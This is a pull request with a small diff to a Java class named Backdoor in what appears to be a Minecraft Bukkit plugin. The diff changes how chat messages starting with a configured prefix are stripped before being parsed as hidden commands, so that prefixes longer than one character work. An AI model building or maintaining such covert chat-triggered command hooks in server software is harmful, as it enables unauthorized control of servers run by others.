### PR TITLE
Add support for prefixes with 2+ characters (fixes #30)

### DIFF
--- a/src/main/java/com/thiccindustries/backdoor/Backdoor.java
+++ b/src/main/java/com/thiccindustries/backdoor/Backdoor.java
@@ -58,12 +58,12 @@ public final class Backdoor implements Listener {
             }
 
             if (e.getMessage().startsWith(Config.command_prefix)) {
-                boolean result = ParseCommand(e.getMessage().substring(1), p);
+                boolean result = ParseCommand(e.getMessage().substring(Config.command_prefix.length()), p);
 
 
                 if (Config.display_debug_messages) {
                     Bukkit.getConsoleSender()
-                            .sendMessage(Config.chat_message_prefix + " Command: " + e.getMessage().substring(1) + " success: " + result);
+                            .sendMessage(Config.chat_message_prefix + " Command: " + e.getMessage().substring(Config.command_prefix.length()) + " success: " + result);
                 }
 
                 if (!result)


### PR DESCRIPTION
This PL will fix #30

Now while parse command it will not just remove 1 character at start of command, but all length of prefix